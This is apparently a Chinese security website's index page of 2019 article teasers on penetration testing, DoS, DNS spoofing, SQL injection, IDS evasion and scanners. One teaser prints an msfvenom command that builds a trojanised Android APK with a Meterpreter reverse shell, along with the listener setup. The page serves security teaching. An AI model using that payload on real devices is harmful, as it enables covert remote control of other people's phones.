首页 网络安全

网络安全

  • CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC主要是用来消耗服务器资源的,每个人都有这样的体验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就 ...
    拒绝服务 2019-9-23 11:48 1919
  • Kali Linux实战篇:Ettercap 使用教程+DNS欺骗攻击实战
    EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具。它具有动态连接嗅探、动态内容过滤和许多其他有趣的技巧。它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性。主要适用于交换局域网络,借 ...
    渗透测试 2019-9-23 11:47 3401
  • 使用kali linux,利用Meterpreter成功渗透Linux主机并新建用户
    前言Meterpreter作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。之前的文章《利用Metasploi ...
    渗透测试 2019-9-23 11:47 4025
  • 网站漏洞检测 解析绕过上传漏洞
    在日常对客户网站进行渗透测试服务的时候,我们经常遇到客户网站,app存在文件上传功能,程序员在设计开发代码的过程中都会对上传的文件类型,格式,后缀名做安全效验与过滤判断,工程师在对文件上传漏洞进行测试的时候,往往发现的网站漏洞都是由于服务器的环境漏洞导致的,像IIS,apache,nginx环境, ...
    网站防护 2019-9-23 11:46 1207
  • 某OA系统从SYSTEM权限SQL注入到内网漫游
    已提交至漏洞盒子,漏洞编号: vulbox-2019-0207481此漏洞属于高危类型, 因为漏洞未经官方公开,敏感内容做打码处理,如有漏打,请提醒。0x01 发现漏洞七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注 ...
    渗透测试 2019-9-22 11:18 2014
  • C/C++ 最易受攻击、70% 漏洞无效,你想了解的全球开源安全现状
    开源是一种精神,更是一种合作共赢的模式。不过如今的开源生态虽然得以让诸多的程序员、技术人们学习、修改以及以任何目的向任何人分发开源软件,但是这并不意味着足够的安全。在本文中,我们将从最新发布的《开源漏洞管理现状》中深入了解开源组件安全的现状与趋势。如今,使用开源已经成为一种主流的 ...
    安全学院 2019-9-22 11:18 861
  • Fragscapy:绕过防火墙和IDS的新工具
    Fragscapy是什么?在Amossys公司中,我们经常需要分析防火墙和IDS的功能及其配置,这往往很费时费力。自然,我们需要开发一些基本工具和脚本来进行自动化分析。而Fragscapy旨在对这些工具和脚本进行改进和整合,最终得到一个一个自动化、模块化、可扩展的Python 3项目。顾名思义,Fragscapy是基于Scapy ...
    安全学院 2019-9-21 09:29 1142
  • 一组很棒的渗透测试资源。渗透测试是对计算机系统及其物理基础设施发起授权的、模拟的攻击,以暴露潜在的安全弱点和漏洞的实践。此项目由Netsparker Web应用程序安全扫描器支持内容匿名工具反病毒逃避工具书防御性编程书籍黑客手册系列丛书锁拿书恶意软件分析的书网络分析的书渗透测试书籍逆向工程的书 ...
    渗透测试 2019-9-20 11:09 1727
  • Kali系列之入侵安卓手机
    1.查看kali的IP2.输入生成反弹木马命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.21.128 lport=55555 R > /home/1.apk3.启动msfconsole,配置相关参数msfconsole //启动msfconsoleuse exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Paylo ...
    渗透测试 2019-9-20 11:06 3348
  • 你了解过渗透测试扫描器FuXi-Scanner吗
    伏羲是一款开源的安全检测工具,适用于中小型企业对企业内部进行安全检测和资产统计。功能一览:基于插件的漏洞扫描功能(类似于巡风)漏洞管理多种协议的弱口令检测企业的子域名收集企业内部资产管理与服务探测端口扫描AWVS接口调用1.拉取镜像docker pull jeffzh3ng/fuxi-scanner2.安装容器docker run ...
    渗透测试 2019-9-20 11:03 1628
  • 随着互联网的普及,网络安全变得越来越重要,程序员需要掌握最基本的web安全防范,下面列举一些常见的安全漏洞和对应的防御措施。0x01: XSS漏洞1、XSS简介跨站脚本(cross site script)简称为XSS,是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。XSS是指恶意攻击者利用网站 ...
    安全学院 2019-9-19 13:43 832
  • 网络技术的更新迭代和网络空间的快速扩展,为人类的生产活动、生活方式、社交范围、获取知识等带来了翻天覆地的变化,利用网络从事生产生活活动在当下生活中早已不可或缺。然而网络的复杂性和持续扩张的特点,我们在享受网络发展带来的种种便利的同时,也面临着愈发严峻的网络安全问题,网络攻击、网络 ...
    安全学院 2019-9-18 11:21 734
  • 网站漏洞测试 sql注入攻击代码的审计与检测
    wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。目前发现的wor ...
    渗透测试 2019-9-17 09:34 1311
  • 比特币的加密技术终将被破解
    区块链与密码、数字签名、哈希函数等加密技术息息相关,对安全加密技术的要求较高。无论是加密技术,还是加密通信协议,攻击者一直在提高攻击手段,加密技术的安全性随着时间的流逝不断降低。即使最初区块链使用了安全加密技术,经过一段时间后,加密技术也会不堪一击,随时可能成为攻击的对象。以比特 ...
    安全学院 2019-9-17 09:33 918
  • 引子:Nessus是著名信息安全服务公司tenable推出的一款漏洞扫描与分析软件,号称是"世界上最流行的漏洞扫描程序,全世界超过75,000个组织在使用它"。尽管这个扫描程序可以免费下载得到,但是要从Tenable更新到所有最新的威胁信息,每年的直接订购费用是$1,200,也就是每个月100美刀。在Linux, FreeBS ...
    漏洞挖掘 2019-9-17 09:27 3534
返回顶部